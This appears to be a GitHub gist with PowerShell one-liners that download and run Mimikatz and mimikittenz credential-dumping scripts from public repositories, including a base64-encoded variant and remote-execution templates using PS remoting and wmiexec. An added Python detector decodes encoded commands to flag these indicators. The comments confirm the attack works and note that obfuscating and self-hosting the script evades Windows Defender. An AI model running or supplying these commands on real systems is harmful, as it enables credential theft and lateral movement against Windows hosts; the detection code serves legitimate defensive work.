@gfoss
Last active July 14, 2024 13:03
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
powershell -enc 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
#ps remoting [remote]
Invoke-Command -ComputerName <IP-Address> -ScriptBlock {powershell etc...}
#impacket's wmiexec.py [remote]
wmiexec.py <USER:PASSWORD@IP-Address> "powershell -enc powershell etc..."
#mimikittenz [local]
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'); Invoke-mimikittenz
#encoded-mimikittenz [local]
powershell -enc SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcHV0dGVycGFuZGEvbWltaWtpdHRlbnovbWFzdGVyL0ludm9rZS1taW1pa2l0dGVuei5wczEnKTsgSW52b2tlLW1pbWlraXR0ZW56Cg==
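
On the detection side, an added example (not part of the original gist or its author's code): it decodes `-enc` arguments found in process-creation command lines, such as Windows Event ID 4688 or Sysmon Event ID 1, and flags the strings the one-liners above contain. The function names, the indicator list and the sample command lines are constructed for this example.

```python
import base64
import binascii
import re

# Indicator strings taken from the one-liners in this gist; extend as needed.
INDICATORS = {
    "download-cradle": re.compile(r"(?i)\b(IEX|Invoke-Expression)\b.*DownloadString"),
    "mimikatz": re.compile(r"(?i)Invoke-Mimikatz|privilege::debug"),
    "mimikittenz": re.compile(r"(?i)Invoke-mimikittenz"),
}
# A dash/slash flag starting with "e", followed by a base64-looking argument.
ENC_ARG = re.compile(r"(?i)\s[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    for m in ENC_ARG.finditer(cmdline):
        flag = m.group(1).lower()
        # PowerShell accepts -e, -ec and any prefix of -EncodedCommand.
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue
        try:
            raw = base64.b64decode(m.group(2), validate=True)
        except (binascii.Error, ValueError):
            continue
        # -enc expects UTF-16LE; fall back to UTF-8 for blobs built without it.
        if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
            return raw.decode("utf-16-le", errors="replace")
        return raw.decode("utf-8", errors="replace")
    return None

def classify(cmdline):
    """Return the sorted indicator names matching a process command line."""
    text = cmdline + "\n" + (decode_encoded_command(cmdline) or "")
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def b64(script, encoding):
    return base64.b64encode(script.encode(encoding)).decode()

# Constructed process-creation command lines (example.test is a placeholder).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a.ps1'); "
SAMPLES = [
    "powershell.exe -NoP -enc " + b64(CRADLE + "Invoke-Mimikatz -DumpCreds", "utf-16-le"),
    "powershell -e " + b64(CRADLE + "Invoke-mimikittenz", "utf-8"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or ["clean"], "<-", line[:48])
```

Command-line auditing only sees the outer `powershell -enc ...` invocation; PowerShell script block logging (Event ID 4104) records the decoded script itself and is the better source where it is enabled.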
@gfoss
Author

gfoss commented Jan 3, 2020

Yeah - if you have Windows Defender enabled, this will not work, unfortunately. They flag on mimikatz in all the many ways you can utilize the tool... One method that still works is obfuscating the Invoke-Mimikatz.ps1 script and hosting this on your own server. That is outside of the scope of this gist though, this is mainly to show how mimikatz works via quick proof of concept.

@rexbutz

rexbutz commented Jan 11, 2022

These seem to no longer be working now.

@gfoss
Author

gfoss commented Jan 12, 2022

Thanks for the heads-up @rexbutz! I've updated this to point to the correct Empire repository and have verified that the attack now works as intended. That said, it will only be successful if Microsoft's real-time protection is disabled, other antivirus software is in use, or you get creative.
